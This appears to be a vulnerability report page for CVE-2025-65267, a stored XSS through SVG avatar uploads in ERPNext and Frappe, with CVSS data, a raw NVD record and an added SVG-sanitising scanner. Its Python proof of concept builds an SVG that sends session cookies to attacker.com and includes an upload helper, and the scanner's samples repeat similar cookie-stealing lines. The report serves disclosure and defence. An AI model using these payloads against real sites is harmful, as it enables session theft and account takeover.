Security Vulnerability Report
CVE-2025-65267 CVSS 9.0 CRITICAL

Published: 2025-12-03 15:15:55
Last Modified: 2025-12-05 18:35:20

Description

In ERPNext v15.83.2 and Frappe Framework v15.86.0, improper validation of uploaded SVG avatar images allows attackers to embed malicious JavaScript. The payload executes when an administrator clicks the image link to view the avatar, resulting in stored cross-site scripting (XSS). Successful exploitation may lead to account takeover, privilege escalation, or full compromise of the affected ERPNext instance.

CVSS Details

CVSS Score
9.0
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:frappe:erpnext:15.83.2:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:frappe:frappe:15.86.0:*:*:*:*:*:*:* - VULNERABLE
ERPNext < v15.83.2
Frappe Framework < v15.86.0

Note: the NVD CPE match criteria name only the exact releases ERPNext 15.83.2 and Frappe Framework 15.86.0; the two range lines are not part of the NVD configuration data. The record identifies no fixed release, so treat any instance at or below these versions as affected until a vendor advisory states otherwise.

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-65267 PoC - Malicious SVG Avatar with XSS Payload
# This PoC demonstrates how to create a malicious SVG file that can be uploaded as an avatar
import requests

# Malicious SVG payload with embedded JavaScript.
# The script body is wrapped in CDATA so the XML parser treats the JavaScript
# (including the '<image ...>' in the comment below) as text, not as markup.
# When the victim opens the avatar link directly, the browser renders the SVG as
# a document and the script runs in the origin of the ERPNext site.
svg_payload = '''<?xml version="1.0" encoding="UTF-8"?>
<svg xmlns="http://www.w3.org/2000/svg" width="200" height="200">
  <script type="text/javascript"><![CDATA[
    // Steal session cookies and send to attacker server
    fetch('https://attacker.com/steal?cookie=' + encodeURIComponent(document.cookie))
      .then(response => response.text())
      .then(data => console.log('Cookie stolen'));
    // Alternative: exfiltrate via an event handler instead of <script>
    // <image href="x" onerror="fetch('https://attacker.com/log?data='+document.cookie)"/>
  ]]></script>
  <circle cx="100" cy="100" r="80" fill="#4CAF50"/>
  <text x="50%" y="50%" text-anchor="middle" fill="white" font-size="20">Avatar</text>
</svg>'''

# Save the malicious SVG file
with open('malicious_avatar.svg', 'w') as f:
    f.write(svg_payload)

print('[+] Malicious SVG file created: malicious_avatar.svg')
print('[+] Upload this file as your profile avatar')
print('[+] When admin views your profile, the XSS payload will execute')


# Simulated upload request (adjust URL and auth token accordingly)
def upload_avatar(base_url, auth_token, svg_file_path):
    upload_url = f"{base_url}/api/method/frappe.client.upload_file"
    # Do not set Content-Type by hand: requests generates the multipart boundary
    # itself, and a hand-written 'multipart/form-data' header without it breaks the upload.
    headers = {'Authorization': f'Bearer {auth_token}'}
    with open(svg_file_path, 'rb') as f:
        files = {'file': ('malicious_avatar.svg', f, 'image/svg+xml')}
        data = {'doctype': 'User', 'docname': 'attacker_user', 'fieldname': 'user_image'}
        response = requests.post(upload_url, headers=headers, files=files, data=data)
    response.raise_for_status()
    return response.json()


print('\n[!] Note: This PoC is for educational and security testing purposes only')
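The description and the PoC above show the offensive side: an SVG is accepted as an image while it is really an XML document that can carry script. As an added example (not part of the original PoC and not Frappe/ERPNext project code), the server-side gate that closes this class of bug: parse the upload as XML and refuse it if it contains any construct that can execute script when the browser opens the file as a document. The function names, the attacker.example host and the two sample SVGs are constructed for illustration.

```python
# Added example, not Frappe/ERPNext code: a server-side gate for SVG uploads.
# It parses the file as XML and reports every construct that could run script
# when the browser opens the file as a document: a DOCTYPE/ENTITY declaration,
# <script>, <foreignObject> and other embedding elements, SMIL animation
# elements (which can rewrite href to a javascript: URL), on* event-handler
# attributes, and javascript:/data:/vbscript: URLs in href/xlink:href/src.
import re
import xml.etree.ElementTree as ET

FORBIDDEN_ELEMENTS = {
    "script", "foreignObject", "iframe", "embed", "object",
    "animate", "animateTransform", "set",
}
# Compared on the local name, so xlink:href is covered as well as href.
URL_ATTRIBUTES = {"href", "src"}
# data: is refused too; an avatar gate has no need for embedded raster blobs.
DANGEROUS_SCHEME = re.compile(r"^\s*(javascript|data|vbscript)\s*:", re.IGNORECASE)
DOCTYPE_OR_ENTITY = re.compile(rb"<!(DOCTYPE|ENTITY)", re.IGNORECASE)


def _local_name(qualified: str) -> str:
    """Strip the '{namespace}' prefix ElementTree puts on tags and attributes."""
    return qualified.rsplit("}", 1)[-1]


def scan_svg(data: bytes) -> list:
    """Return a list of findings; an empty list means no scriptable construct was seen."""
    # Refuse DOCTYPE/ENTITY before parsing: entity expansion is a parser DoS
    # vector, so the file is rejected without being handed to the XML parser.
    if DOCTYPE_OR_ENTITY.search(data):
        return ["DOCTYPE or ENTITY declaration (refused before parsing)"]
    try:
        root = ET.fromstring(data)
    except ET.ParseError as exc:
        return [f"not well-formed XML: {exc}"]

    findings = []
    if _local_name(root.tag) != "svg":
        findings.append(f"root element is <{_local_name(root.tag)}>, not <svg>")
    for element in root.iter():
        name = _local_name(element.tag)
        if name in FORBIDDEN_ELEMENTS:
            findings.append(f"forbidden element <{name}>")
        for attribute, value in element.attrib.items():
            attr_name = _local_name(attribute)
            if attr_name.lower().startswith("on"):
                findings.append(f"event handler {attr_name} on <{name}>")
            elif attr_name in URL_ATTRIBUTES and DANGEROUS_SCHEME.match(value):
                scheme = value.split(":", 1)[0].strip()
                findings.append(f"{scheme}: URL in {attr_name} on <{name}>")
    return findings


def is_safe_svg(data: bytes) -> bool:
    """True only when the scan produced no findings."""
    return scan_svg(data) == []


# Constructed sample inputs (not real uploads). The malicious one carries the
# three vectors the PoC relies on: <script>, an onerror handler, a javascript: link.
MALICIOUS_SVG = b"""<?xml version="1.0"?>
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
  <script>fetch('https://attacker.example/steal?c=' + document.cookie)</script>
  <image href="x" onerror="fetch('https://attacker.example/log?c=' + document.cookie)"/>
  <a xlink:href="javascript:alert(document.domain)"><text y="20">click</text></a>
</svg>"""

BENIGN_SVG = b"""<?xml version="1.0"?>
<svg xmlns="http://www.w3.org/2000/svg" width="200" height="200">
  <circle cx="100" cy="100" r="80" fill="#4CAF50"/>
  <text x="50%" y="50%" text-anchor="middle" fill="white" font-size="20">Avatar</text>
</svg>"""

if __name__ == "__main__":
    for label, sample in (("malicious", MALICIOUS_SVG), ("benign", BENIGN_SVG)):
        print(label, "->", scan_svg(sample) or "clean")
```

A clean parse on upload is necessary but not sufficient: the script in the PoC runs because the avatar link serves the raw file in the site's own origin. Pair the gate with a `Content-Disposition: attachment` header (or `Content-Security-Policy: sandbox`) on the file-download route for user uploads, or rasterise avatars to PNG so no SVG is ever served back.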

References

https://github.com/PhDg1410/CVE/tree/main/CVE-2025-65267 (Third Party Advisory)
https://github.com/frappe/erpnext (Product)
https://github.com/frappe/frappe (Product)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-65267", "sourceIdentifier": "[email protected]", "published": "2025-12-03T15:15:55.103", "lastModified": "2025-12-05T18:35:19.883", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In ERPNext v15.83.2 and Frappe Framework v15.86.0, improper validation of uploaded SVG avatar images allows attackers to embed malicious JavaScript. The payload executes when an administrator clicks the image link to view the avatar, resulting in stored cross-site scripting (XSS). Successful exploitation may lead to account takeover, privilege escalation, or full compromise of the affected ERPNext instance."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H", "baseScore": 9.0, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.3, "impactScore": 6.0}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:frappe:erpnext:15.83.2:*:*:*:*:*:*:*", "matchCriteriaId": "E8938912-6E20-4913-A21C-321B5C9D9EE8"}, {"vulnerable": true, "criteria": "cpe:2.3:a:frappe:frappe:15.86.0:*:*:*:*:*:*:*", "matchCriteriaId": "B5DC3F26-8D6D-4530-857A-A7D72CE5A711"}]}]}], "references": [{"url": "https://github.com/PhDg1410/CVE/tree/main/CVE-2025-65267", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://github.com/frappe/erpnext", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/frappe/frappe", "source": "[email protected]", "tags": ["Product"]}]}}